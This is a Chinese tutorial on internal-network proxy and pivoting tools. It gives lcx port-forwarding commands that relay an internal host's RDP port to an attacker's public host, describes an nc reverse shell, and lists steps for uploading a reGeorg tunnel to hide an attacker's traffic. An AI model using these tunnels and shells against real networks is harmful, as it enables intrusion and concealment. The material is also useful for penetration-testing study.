内网代理——常用工具
端口转发工具lcx
Web代理脚本regeorg
Shell反弹脚本nc 、VPN
nc:nc首先对公网主机端口进行监听,再到内网输入公网IP,端口号,以及执行文件,比如cmd.exe,就可以成功反弹内网主机的shell
第一个是 LCX 对 windows 3389 的转发;
第二个是 reGeorg 通过上传对应脚本(PHP/ASPX/JSP),然后全局代理进一步内网渗透;
第三个是 EarthWormLCX:
1)端口转发(listen和slave成对使用 2)端口映射(tran)
Windows版是lcx.exe,Linux版为portmap,
lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389
(1)首先内网主机的 3389 端口转发到具有公网ip主机的 4444 端口
lcx.exe –listen 4444 5555
(2)其次是监听公网主机本机的 4444 端口请求,并将来自 4444 端口的请求传送给 5555 端口。
此时已经把内网的3389端口转发到了公网的5555端口。可以通过127.0.0.1:5555连接到内网的远程桌面。
还有一种情况就是3389出不了防火墙,他还有一项功能就是端口映射,你吧3389映射到一个不被限制的端口就可以直接远程桌面链接了。
reGeorg+proxifier内网代理+端口转发:
目的:攻击者A 通过web应用B 看内网主机C, 在C上查看流量发现是B访问的而非攻击者。
步骤如下:
第一步: 上传tunnel 文件 到 Web应用B
第二步: 在A 上,使用reGeorgSocksProxy.py 并指定端口
第三步: 设置自己的代理Proxifier 或者SocksCap64(本次使用的是proxifier)
第四步: 在C上使用wireshark 查看流量信息。(当然也可以查看日志)内网端口通过http/https转发到本地,然后本地使用socks5正向代理穿透防火墙到达服务器,即是一个环路。
内网代理——常用工具相关推荐
- 内网渗透-常用工具免杀
内网渗透-常用工具免杀 Mimikatz免杀 Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证.票证传递.hash传递.甚至伪造域管理凭证令牌等诸多功能.由于mimikatz的使用说明网 ...
- 内网渗透-内网代理穿透和内网横向移动
内网代理穿透和内网横向移动 文章目录 内网代理穿透和内网横向移动 前言 内网代理穿透 nc termite(ew) ssh正向代理(A,B,C) msf设置路由和sock4代理访问内网流量 内网横向移 ...
- 内网穿透 NPS工具实现内网穿透
内网穿透 NPS工具实现内网穿透 官网的简介 NPS是一款轻量级.高性能.功能强大的内网穿透代理服务器.目前支持tcp.udp流量转发,可支持任何tcp.udp上层协议(访问内网网站.本地支付接 ...
- 内网渗透----netcat工具使用
内网渗透----netcat工具使用 一.环境准备 1.1 设备准备 1.2 软件准备 二.使用方法 一.环境准备 1.1 设备准备 这把我们直接点,使用nc进行端口转发,我们需要三台设备 靶机,ip ...
- 端口转发与代理工具 内网代理 内网反弹代理
目录 一.LCX 二.nc 反弹 三.socks代理工具 四.frp 内网穿透利器 五.ngrok 内网穿透 理论上,任何接入互联网的计算机都是可访问的,但是如果目标主机处于内网,而我们又想和该目标主 ...
- 内网代理工具--reGeorg
一.简介 reGeorg是reDuh的继承者,利用了会话层的socks5协议,效率更高结合Proxifier使用 Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工 ...
- 钉钉内网穿透工具——简单、快速、高效(钉钉于2022年7月21日起,不再提供内网穿透的工具服务)
内网穿透示意图 图片取自https://help-static-aliyun-doc.aliyuncs.com/assets/img/zh-CN/9904269951/p163821.png 下载钉钉 ...
- 80端口攻击_内网端口转发工具的使用总结
0x00 ew端口转发 0x01 portmap端口转发 0x02 htran端口转发 0x03 ssh端口转发 0x00 ew端口转发 环境准备 攻击机 win7(物理机) 192.168.3 ...
- linux 内网文件传输工具_不管你是新手PHP程序员还是大佬都要知道的PHP十大必备工具...
1.Notepad++ 总结来说就是小而精,7.4版本的软件包只有2.9M,比一般的IDE小数十倍,但是Notepad++的功能确是很全面的,代码高亮,语法折叠,宏功能,内置支持27种编程语言,基本上 ...
- 内网代理穿透2:termite代理穿透
文章目录 前言 一.基础选项用法 二.具体使用 1.建立代理节点 2.具体攻击 总结 前言 termite工具前身是ew,在复杂的内网环境他的使用很人性化.操作也是十分便捷. 程序主要分为两部分,控制 ...
最新文章
- 数据的规范化,归一化,标准化,正则化
- [Leetcode]@python 68. Text Justification
- [转载]LEB128格式简介(CN)
- Entity Framework4.0 (一)概述(EF4 的Database First方法)
- Cloud一分钟 | 误删生产数据库血案,顺丰高级工程师被开除;阿里巴巴暂停美国云计算扩张?阿里云总裁正式回应:“不会减少投入”...
- 用Netty撸一个心跳机制和断线重连!
- 一文了解GaussDB 200的产品架构、数据流程、组网方案、服务部署原则、企业级增强特性......
- 纯CSS的方法解决文字溢出与截断的问题
- LeetCode345. Reverse Vowels of a String
- python中逻辑运算_Python 逻辑运算之 'and' 和 'or'
- PGM:部分观测数据
- 甲骨文创始人埃里森的10大混蛋行为:曾翻微软垃圾堆
- python 遍历_python dict 两种遍历方式的比较
- Java 登录拦截器
- 基于python的ROOT-MUSIC算法
- linux系统点歌机 ntfs分区,嵌入式点歌机说明
- PGP的安装及使用,利用加密软件PGP对邮件内容进行加密和解密,保姆级教学
- 浅谈 Java 24个设计模式(23个GoF设计模式 + 简单工厂模式) 之 六个创建型模式...
- 数据结构课设:基于字符串模式匹配算法的病毒感染检测问题
- 用计算机绘制函数图像ppt,ppt中怎么绘制三角函数图像?
热门文章
- 生成条形码(jsbarcode、vue-barcode)
- Excel表格批量生成Word文档
- 网络服务器是硬盘吗,云盘与网络服务器硬盘是什么?它们一样吗?
- 简单分析实现运维利器---webssh终端
- Git遇到的问题:This is not a valid source path/URL
- 回顾过去三年工作中对区块链技术的一点心得
- SPI通信协议_02
- 上海个税系统代理服务器地址,上海个人所得税打印地点
- Alfred效率神器
- python网址解码_python用于url解码和中文解析的小脚本(python url decoder)